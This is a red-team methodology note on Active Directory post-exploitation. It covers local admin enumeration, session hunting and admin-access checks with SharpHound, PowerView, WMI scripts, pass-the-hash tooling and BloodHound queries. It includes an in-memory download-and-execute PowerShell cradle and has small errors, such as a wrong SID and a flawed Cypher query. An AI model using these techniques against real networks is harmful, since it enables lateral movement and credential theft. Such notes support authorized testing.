# Exploitation - Credentials theft shuffling
### Local groups enumeration
Enumerating local groups members, and notably the (local or domain-joined) members of the local `Administrators` / `Administratreurs` (`SID`: `S-1-5-32-544`) built-in group, is a crucial step in the credentials theft shuffling process. Indeed, an enumeration of local groups members is a more efficient and stealthy way to find what computers the compromised accounts have access to than direct connection attempts. In additions to the local `Administrators` group, membership to the `Remote Desktop Users` / `Utilisateurs du Bureau à distance` (`SID`: `S-1-5-32-555`) and `Distributed COM users` / `Utilisateurs du modèle COM distribués` (`SID`: `S-1-5-32-562`) groups should be enumerated as well as such membership can be leveraged for remote code execution.
Two techniques, and associated tooling, can be used to enumerate the local groups members of remote hosts:
* Queries to the `Security Accounts Manager` database of the remote host using the `Security Account Manager (SAM) Remote Protocol (MS-SAMR)` (through the `MSRPC` `SAMR` interface).
* Enumeration of the local administrators configured through Active Directory `Group Policy Objects (GPO)`.
| Use case | Recommended tool(s) |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| One-time enumeration across the whole target Active Directory domain or forest.
-
Local Administrators groups members.
| BloodHound (collection using SharpHound's All or LocalAdmin collection methods).
PingCastle's localadmin module. PingCastle presents the advantage of usually not being flagged by anti-virus solutions.
Both SharpHound and PingCastle's localadmin module rely on direct and curated SAMR RPC calls (notably SamGetMembersInAlias) and conduct the enumeration using the RID 544 alias (DOMAIN\_ALIAS\_RID\_ADMINS).
|
| One-time enumeration across the whole target Active Directory domain or forest.
-
Administrators and others local groups that yield remote execution privileges.
| `BloodHound` (collection using `SharpHound`'s `All` or `LocalGroup` collection methods). In additions to members of the local `Administrator` group, `SharpHound` can enumerate members of the `Remote Desktop Users` and `Distributed COM users` groups. |
| Complementary manual enumeration on one host. | `PingCastle`'s `localadmin` module executed in `interactive mode` to manually specify the targeted host. |
| Complementary manual enumeration on a limited number of hosts. | PowerView's Find-DomainLocalGroupMember PowerShell cmdlet.
Find-DomainLocalGroupMember present the notable disadvantage of conducting the enumeration using the group name (by default Administrators) instead of the RID 544 alias, and thus is not able to enumerate local groups members of Windows operating systems in different languages at the same time.
Relies on the NetLocalGroupGetMembers API (by default) or on the Active Directory Service Interfaces (ADSI) WinNT provider.
|
| In a covert scenario in which the completeness of the results is traded for stealth. | BloodHound (collection using SharpHound's GPOLocalGroup or DcOnly collection methods).
PowerView's Get-DomainGPOUserLocalGroupMapping PowerShell cmdlet.
|
**RPC calls to the MSRPC SAMR interface**
Numerous tools can be used to conduct the local groups members enumeration through `RPC` queries to the `MSRPC` `SAMR` interface of remote hosts.
The `RPC` calls can be implemented through the `Win32API`'s `NetLocalGroupGetMembers` API, the `Active Directory Service Interfaces (ADSI) WinNT` provider or direct and curated `RPC` calls (as implemented by `SharpHound`).
Note that the possibility to make remote calls to the `SAM` of remote hosts through the `SAMRPC` protocol is by default restricted to members of the local `Administrators` group starting from the `Windows 10, version 1607` and `Windows Server 2016` operating systems. Specific `Knowledge Base (KB)` can also be installed on Windows operating systems, starting from `Windows 7` and `Windows Server 2008 R2`, to configure the aforementioned restriction (`KB 4012218` - `KB 4012220`, `KB 4012606` or `KB 4103198` depending on the operating system).
*BloodHound / PingCastle*
`BloodHound`'s `SharpHound` collector or `PingCastle` can be used for an automated enumeration of the local groups members of all the computers joined in the targeted Active Directory domain.
`PingCastle` returns a text file with the enumerated computers fully qualified hostnames and the members of their local built-in `Administrators` group. `SharpHound` returns a `ZIP` archive (containing `JSON` files) that can be imported into a `Neo4j` database using `BloodHound`.
For more information on both tools, refer to the `[Active Directory] AD scanner` note.
```
# BloodHound's SharpHound.
# Either the PowerShell SharpHound.ps1 (that inlines the C# DLL) or the C# SharpHound.exe collector may be used.
Invoke-Bloodhound -Verbose -CollectionMethod
Invoke-Bloodhound -Verbose -Domain '' -DomainController '' -LDAPUsername '' -LDAPPassword '' -CollectionMethod
SharpHound.exe -v --Domain '' --domaincontroller '' --ldapusername '' --ldappassword '' -c
# PingCastle.
# Enumeration on all the computers integrated into the current or specified Active Directory domain.
PingCastle.exe --scanner "localadmin"
PingCastle.exe --server --user "\" --password "" --scanner "localadmin"
# Executes PingCastle in interactive in order to manually specify the targeted host.
.\PingCastle.exe
-> 4-Scanner -> 6-localadmin -> 2-one ->
```
*PowerView*
```
# Injection in memory of PowerView from the Empire maintained fork. Alternatively, the `PowerView.ps1` PowerShell script can be hosted on a controlled web server.
(New-Object System.Net.WebClient).Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
# PowerView - single computer "Administrators" members
Find-DomainLocalGroupMember -ComputerName
Find-DomainLocalGroupMember -ComputerName -ComputerDomain -Server -Credential
# PowerView - multiple computers "Administrators" members
Find-DomainLocalGroupMember | Export-Csv -Path
Find-DomainLocalGroupMember -ComputerDomain -Server -Credential
```
**From Group Policy Objects**
The second technique pulls the local administrators configured through `Group Policy Objects (GPO)`. Local group membership can be defined using `Restricted Groups` in `GptTmpl.inf` file or group membership in `Group Policy Preferences groups.xml` files.
In the `GptTmpl.inf`, users or group will added in the built-in Administrators group using the line:
```
[Group Membership]
*S-1-5-32-544__Members = <*SID | USERNAME | GROUPNAME>
```
This technique present the advantage of being stealthier as no direct queries to each computers are made to retrieve the local administrators group members. However, any user or group added in the local Administrators group directly on the master image will be missed.
Note: GPO can be linked to an OU but not necessarily applied, as an OU can `blocks inheritance` on an not `enforced` GPO or a conflicting GPO with a higher precedence order may supplant the exploitable GPO.
```
# Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences
# The 'GroupName' specify the group to which the 'GroupMembers' are added
Get-DomainGPOLocalGroup
Get-DomainGPOLocalGroup -Domain -Server -Credential
Get-DomainOU -GPLink "" | ForEach-Object {
Get-DomainComputer -SearchBase "LDAP://$($_.distinguishedname)" | Ft Name
}
```
Note that the tooling of this technique is still experimental and that the tools presented below may not yield comprehensive results.
```
SharpHound's 'GPOLocalGroup', 'DcOnly' or 'All' collection methods.
# Enumerates the machines where a specific domain user/group is a member of a specific local group
# If no user/group is specified, all discoverable mappings are returned.
Get-DomainGPOUserLocalGroupMapping
Get-DomainGPOUserLocalGroupMapping -Identity -LocalGroup -Domain -Server -Credential
# Enumerates a specified local group for the targeted machine
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity -LocalGroup
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity -LocalGroup -Domain -Server -Credential
```
Moreover, GPO can be used to define user rights on the computers the GPO is applied to, such as the logon right `SeRemoteInteractiveLogonRight` and specific privileges. Some of these privileges can be used to locally elevate privileges or directly dump the `LSASS` process. Reviewing the user rights defined in GPO can thus lead to more vectors of credentials re-use. Refer to the `Active Directory - GPO users rights` for more information.
**Local groups BloodHound Cypher queries**
`SharpHound` result can be consulted through the `BloodHound` graphical interface or queried using direct `Neo4j`'s `Cypher` queries (executed in the `Neo4j` web console).
```
# BloodHound GUI.
# For user or group nodes.
Node Info
-> Local Admin Rights
-> First Degree Local Admin / Group Delegated Local Admin Rights
-> Execution Privileges
-> First Degree RDP Privileges / Group Delegated RDP Privileges
-> First Degree DCOM Privileges / Group Delegated DCOM Privileges
-> SQL Admin Rights
-> Constrained Delegation Privileges
# For computer nodes.
Node Info
-> Local Admin
-> Local Admins / Explicit Admins / Unrolled Admins / Foreign Admins / Derivative Local Admins
-> Inbound Execution Privileges
-> First Degree Remote Desktop Users / Group Delegated Remote Desktop Users
-> First Degree Distributed COM Users / Group Delegated Distributed COM Users
-> SQL Admins
# Neo4j's Cypher queries.
# The queries below should be executed through the Neo4j web console (by default accessible at http://localhost:7474/browser/).
# Local Administrators.
# First degree membership of the specified domain user to local Administrators groups.
MATCH (u:User) WHERE u.name =~ "@" MATCH (c:Computer) MATCH p=allShortestPaths((u)-[r:AdminTo]->(c)) RETURN c.name
# Both first degree and group delegated membership of the specified domain user to local Administrators groups.
MATCH (u:User) WHERE u.name =~ "@" MATCH (c:Computer) MATCH p=allShortestPaths((u)-[r:AdminTo|MemberOf*1..]->(c)) RETURN c.name
# First degree membership of Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to local Administrators groups of all computers integrated in the BloodHound database.
MATCH (g:Group) WHERE g.objectid ENDS WITH '-513' OR g.objectid ENDS WITH 'S-1-5-11' OR g.objectid ENDS WITH 'S-1-1-0' OR g.objectid ENDS WITH 'S-1-5-7' MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo]->(c)) RETURN c.name
# Both first degree and group delegated membership of Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to local Administrators groups all computers integrated in the BloodHound database.
MATCH (g:Group) WHERE g.objectid ENDS WITH '-513' OR g.objectid ENDS WITH 'S-1-5-11' OR g.objectid ENDS WITH 'S-1-1-0' OR g.objectid ENDS WITH 'S-1-5-7' MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo|MemberOf*1..]->(c)) RETURN c.name
# Possible code execution (local Administrators, Remote Desktop Users, Distributed COM users, LAPS password delegation, etc.).
# Possible code execution of the specified domain user to all computers integrated in the BloodHound database.
MATCH (u:User) WHERE u.name =~ "@" MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo|GenericAll|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|ReadLAPSPassword|SQLAdmin|CanPSRemote]->(c)) RETURN c.name
# Possible code execution of Everyone, Anonymous, Authenticated Users, Domain Users or Domain Computers to all computers integrated in the BloodHound database.
MATCH (g:Group) WHERE g.objectid ENDS WITH '-513' OR g.objectid ENDS WITH 'S-1-5-11' OR g.objectid ENDS WITH 'S-1-1-0' OR g.objectid ENDS WITH 'S-1-5-7' MATCH (c:Computer) MATCH p=allShortestPaths((g)-[r:AdminTo|GenericAll|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|ReadLAPSPassword|SQLAdmin|CanPSRemote]->(c)) RETURN c.name
```
### Sessions hunting
Enumerating the sessions established on the machines of the Active Directory domain is also a crucial step in the credentials theft shuffling process. Indeed, an enumeration of the current sessions is tremendously faster than large scale dumping and credentials extraction from `LSASS` processes on a domain level. Additionally, it allows for the addition of sessions in the computation of more complex attack paths through graph theory (using `BloodHound` for example).
Multiple techniques, and associated tooling, can be used to enumerate the sessions established across the targeted Active Directory domain:
* Enumeration of the sessions established on the machines in the domain using the Windows `Win32API`'s `NetSessionEnum` function. This method does not directly query the systems to enumerate their currently logged-on users but rely on retrieving the sessions established on a machine (likely a server) from others Windows systems. While this method only returns partial results, notably for logged-on users that did not establish any session on remote servers, it is the only one that does not require elevated privileges on the queried host.
* Access of remote hosts `user profile` registry hives using the `Remote Registry` `RPC` protocol. As a new `user profile` hive is created each time a new user logs on to a computer, the `user profile` registry hives of a computer give information about past and present logged-on users. This method does not require elevated privileges but the Windows `Remote Registry` service to be running on the remote host.
* Direct querying of remote hosts for information about all users currently logged-on using the `Win32API`'s `NetWkstaUserEnum` function or `WMI`'s `Win32_LoggedOnUser` class. This method requires elevated privileges on the queried host.
* Remote listing of the processes of hosts and enumerating the ones being executed in the security context of a domain user, which requires elevated privileges on the queried host.
* Remote extraction of the Windows `Security` events `4624: An account was successfully logged on` on hosts' `Security` hives and listing of the domain users connections. This method requires the right to access the `Security` `EVTX` hive on the remote host.
While leveraging the Windows `Win32API`'s `NetSessionEnum` function and access to `user profile` hives do not require elevated privileges on the remote hosts, if an account member of the `Administrators` group of a number of machines could be compromised, others options may be used to enumerate sessions with a better precision. Notably, these alternative methods may prove useful if `Find-DomainUserLocation` or `SharpHound`'s `Session` or `All` collection methods did not manage to detect `Domain Admins` sessions. In order to find on which machines compromised accounts are member of the local `Administrators` group, refer to `Local groups enumeration` section above.
| Use case | Recommended tool(s) |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| One-time enumeration across the whole target Active Directory domain or forest **using an unprivileged domain user**. | BloodHound (collection using SharpHound's All or Session collection methods).
-> Leverages Win32API's NetSessionEnum function.
|
| One-time enumeration across the whole target Active Directory domain or forest **using a privileged domain user** for a more comprehensive sessions enumeration (in a security review kind of engagement for example). | BloodHound (collection using SharpHound's All or LoggedOn collection methods).
-> Leverages both Win32API's NetWkstaUserEnum function and access to Users registry hives using the Remote Registry RPC protocol.
|
| Complementary manual enumeration on one or a limited number of hosts **using an unprivileged domain user.** | PowerView's Find-DomainUserLocation PowerShell cmdlet.
BloodHound (collection using SharpHound's Session collection method and by specifying the targeted systems using the -ComputerFile (SharpHound.ps1) / --computerfile (SharpHound.exe) parameter.)
PowerView's Get-RegLoggedOn (which requires the Windows Remote Registry service to be running on the targeted hosts).
|
| Complementary manual enumeration on one or a limited number of hosts using an account with Administrators privileges on the targeted hosts.
This use case may arise after the compromise of an additional domain or local account.
| Get-WmiObject Win32\_LoggedOnUser and Get-WmiObject Win32\_LoggedOnUser using the provided PowerShell code snippets below.
PowerView's Find-DomainUserLocation PowerShell cmdlet.
This technique reduces the number of false positives induced by using the Users registry hives as implemented by SharpHound's LoggedOn collection method.
|
**Unprivileged calls to the Win32API's NetSessionEnum function**
The Windows `Win32API`'s `NetSessionEnum` function provide information about sessions established on a computer. It does not provide information about users that are directly logged-on on the queried host but returns information on the sessions established on the host (likely a server) from others Windows computers.
While different level of information can be retrieved using the `NetSessionEnum` function, only the `level 0` or `level 10` calls are allowed for users with out elevated privileges on the remote host. The `level 10` calls, leveraged by offensive tools, return `SESSION_INFO_10` structure(s), which contain:
* `sesi10_cname`: the name of the computer that established the session;
* `sesi10_username`: the name of the user who established the session;
* `sesi10_time`: the number of seconds the session has been active;
* `sesi10_idle_time`: the number of seconds the session has been idle.
The `PowerView`'s `Get-NetSession` cmdlet as well as the `SharpHound`'s `Session` collection method wrap around the `NetSessionEnum` function.
```
Get-NetSession -ComputerName
Get-NetSession -Credential -ComputerName
```
Additionally, the `PowerView`'s `Find-DomainUserLocation` cmdlet combine the `Get-NetSession` and `Get-NetLoggedon`, introduced below, cmdlets to find machines where the specified user or group's members are logged-on. The `ShowAll` flag can also be specified to return all user's session, on all machines or on the specified machine.
If the `Stealth` flag is specified, then servers with likely highly-traffic are enumerated with `Get-DomainFileServer` and `Get-DomainController` and session enumeration is executed only against those servers using `Get-NetSession`.
If the `CheckAccess` flag is specified, the `PowerView` cmdlet `Test-AdminAccess` will be called to check if the current user context has local administrator access to the machine on which the target members have a session on. Note that the `CheckAccess` does not take into account credentials specified using the `Credential` parameter. The `CheckAccess` call can be patched using the following code:
```
# Target: either UserGroupIdentity or UserIdentity
# Default to UserGroupIdentity = "Domain Admins"
Find-DomainUserLocation
Find-DomainUserLocation -Server -Credential
Find-DomainUserLocation -UserGroupIdentity
Find-DomainUserLocation -UserIdentity
# Find all active sessions on the specified machine
Find-DomainUserLocation -ShowAll -ComputerName
# Check if the current user context has administrator access to the machine on which the target members have a session on
Find-DomainUserLocation -CheckAccess
```
**Unprivileged access to Users registry hives through the Remote Registry protocol**
Each time a new user logs on to a computer, a new `user profile` hive is created for that user under the `HKEY_USERS` key. This hive contains registry information relative to the user's settings. The `user profile` registry hives of a computer thus give information about past and present logged-on users.
As `user profile` registry hives are not automatically purged, this enumeration can induce false positives by identifying users that are no longer logged-on the targeted host.
While remote access to the `user profile` registry hives of a given host does not require elevated privileges on the remote host, the Windows `Remote Registry` service must be running on the host (which is not the case by default). The registry access is made through the `Remote Registry` protocol.
The `PowerView`'s `Get-RegLoggedon` cmdlet as well as the `SharpHound`'s `LoggedOn` collection method implement this enumeration method. The `SharpHound`'s `LoggedOn` collection method additionally tries to enumerate the logged-on users using the `Win32API`'s `NetWkstaUserEnum` function (which will only be successful if `SharpHound` is being executed under a security context with elevated privileges on the remote hosts).
```
Get-RegLoggedon -ComputerName
```
**Privileged calls to the Win32API's NetWkstaUserEnum function**
The Windows `Win32API`'s `NetWkstaUserEnum` function provides information about users logged on a computer. Note that on newer versions of Windows, the use of the `NetWkstaUserEnum` function requires `Administrators` privileges on the remote system.
The `PowerView`'s `Get-NetLoggedon` cmdlet as well as the `SharpHound`'s `LoggedOn` collection method wrap around the `NetWkstaUserEnum` function. The `SharpHound`'s `LoggedOn` collection method additionally leverages the `Remote Registry` protocol to enumerate `user profile` registry hives, which can induce false positives about users that are no longer logged on the targeted host.
```
# Built-in
WMIC /NODE: COMPUTERSYSTEM GET USERNAME
Get-WmiObject Win32_LoggedOnUser -ComputerName
Get-WmiObject Win32_LoggedOnUser -Credential -ComputerName
# PowerView
Get-NetLoggedon -ComputerName
Get-NetLoggedon -Credential -ComputerName
```
This enumeration can also be done directly using the `WMI`'s `Win32_LoggedOnUser` class:
```
$Credential =
$InputFile =
Get-Content $InputFile | ForEach-Object {
$ComputerName = $_
Get-WmiObject Win32_LoggedOnUser -Credential $Credential -ComputerName $ComputerName| ForEach-Object {
[pscustomobject]@{
ComputerName = "$ComputerName"
UserName = $("{0}\{1}” -f $_.Antecedent.ToString().Split('"')[1], $_.Antecedent.ToString().Split('"')[3])
}
} | Select-Object -Unique ComputerName, Username | Where-Object -FilterScript {$_.Username -ne '\'}
}
```
**Privileged remote listing of processes**
The users running processes on the remote machine can be enumerated to find active session. The `PowerView`'s cmdlet `Find-DomainProcess` leverages `Get-WMIProcess` to remotely list the processes running on the targeted machine, or all machines integrated in the current (or specified) domain. It can be used to list processes being executed by a specific user or by users in a specific group.
```
# Target: either UserGroupIdentity or UserIdentity.
# Default to UserGroupIdentity = "Domain Admins".
Find-DomainProcess
Find-DomainProcess -Server -Credential
Find-DomainProcess -UserGroupIdentity
Find-DomainProcess -UserIdentity
# If the list of machines a given user has Administrator access to is saved in a file, the following can be used to retrieve the active users on the machines.
[string[]]$arrayFromFile = Get-Content -Path
$commaSeparatedList = '"{0}"' -f ($arrayFromFile -join '","')
Find-DomainProcess -Server -Credential -ComputerName $commaSeparatedList
```
This enumeration can also be done directly using the `WMI`'s `Win32_Process` class:
```
$(Get-WmiObject -Credential -Class Win32_Process -ComputerName ).GetOwner().user | Select-Object -Unique
# Script to enumerate all users having at least one running process on the specified machines.
$Credential =
$InputFile =
Get-Content $InputFile | ForEach-Object {
$ComputerName = $_
Get-WmiObject -Class Win32_Process -Credential $credentials -ComputerName $ComputerName | ForEach-Object {
[pscustomobject]@{
ComputerName = "$ComputerName"
UserName = $($_.GetOwner().Domain)+"\"+$($_.GetOwner().User)
}
} | Select-Object -Unique ComputerName, Username | Where-Object -FilterScript {$_.Username -ne '\'}
}
```
**Privileged remote searches of Security EVTX hives**
The `PowerView`'s cmdlet `Find-DomainUserEvent` can be used to find `Security`'s `4624: An account was successfully logged on` events on all domain controllers or on the specified machines.
This method requires the right to access the `Security` `EVTX` hive on the targeted machines, which is granted to members of the local `Administrators` (`SID`: `S-1-5-32-548`) and `Event Log Readers` (`SID`: `S-1-5-32-573`) groups.
```
# By default, search for any user events matching domain admins on every DC in the current domain.
Find-DomainUserEvent
Find-DomainUserEvent -Server -Credential
Find-DomainUserEvent -ComputerName -UserIdentity
# If the list of targeted machines is saved in a file, the following PowerShell code snippet can be used to retrieve the logged on events of the machines.
[string[]]$arrayFromFile = Get-Content -Path
$commaSeparatedList = '"{0}"' -f ($arrayFromFile -join '","')
Find-DomainUserEvent -Server -Credential -ComputerName $commaSeparatedList
```
### Optional checking of remote local admin access
While enumerating local administrators and active sessions is a good way to quickly approximate if any compromised accounts may be used for lateral movement, only direct authentication requests on targeted computers can yield comprehensive results.
The PowerShell cmdlets `Invoke-CheckLocalAdminAccess`, replacing `Test-AdminAccess`, of `PowerView` and `Check-LocalAdminHash` can be used to do so, respectively using `PSCredential` or NTLM hashes.
`Test-AdminAccess` relies on the Windows API `OpenSCManagerW Win32API` while `Check-LocalAdminHash` passes a NTLM hash into the NTLMv2 authentication protocol over SMB or WMI (by default).
The `CrackMapExec` utility can be used as well, to test local admin access using either passwords or NTLM hashes over SMB or WMI.
```
Invoke-CheckLocalAdminAccess -ComputerName
# With the AllSystems switch, Check-LocalAdminHash will utilize PowerView modules to enumerate all domain enrolled computers
# The UserDomain should be specified only if a domain account is provided
Check-LocalAdminHash -UserDomain -Username -PasswordHash -AllSystems
Check-LocalAdminHash -UserDomain -Username -PasswordHash -TargetList
# TARGETS can be IP(s), range(s), CIDR(s), hostname(s), FQDN(s) or file(s) containg a list of targets
crackmapexec (-d | --local-auth) -u (-p | -H )
```
### Lateral movements
Multiples mechanisms and tools can be used for lateral movements in a Windows environment.
The `Windows - Lateral movements` note introduces the main techniques and tooling.
### Credentials dumping
Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system. The Windows operating system notably stores user accounts authentication information in the `HKEY_LOCAL_MACHINE\Security Account Manager (SAM)` and `HKEY_LOCAL_MACHINE\SECURITY` registry hives as well as the `Local Security Authority Subsystem (LSASS)` process.
For techniques and tools to efficiently dump credentials on a Windows host, refer to the `[Windows] Post Exploit` note.
***
### References